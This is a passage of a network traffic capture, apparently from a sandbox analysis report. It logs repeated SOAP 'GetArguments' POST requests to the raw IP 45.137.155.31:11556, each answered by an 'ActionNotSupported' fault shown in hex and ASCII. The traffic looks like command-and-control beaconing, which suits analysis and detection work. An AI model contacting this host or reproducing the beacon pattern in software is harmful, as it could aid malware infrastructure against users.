                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:39.747920990 CEST10675OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:39.819608927 CEST10675INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:39.893023014 CEST10676INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:39 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:40.904839039 CEST10676OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:40.981132030 CEST10676INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:41.051243067 CEST10677INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:40 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:42.060776949 CEST10678OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:42.129812002 CEST10678INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:42.199770927 CEST10679INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:41 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:43.217477083 CEST10680OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:43.289048910 CEST10681INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:43.360315084 CEST10682INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:43 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:44.373850107 CEST10682OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:44.445511103 CEST10682INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:44.515374899 CEST10683INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:44 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:45.529772997 CEST10684OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:45.598979950 CEST10684INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:45.670629025 CEST10685INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:45 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 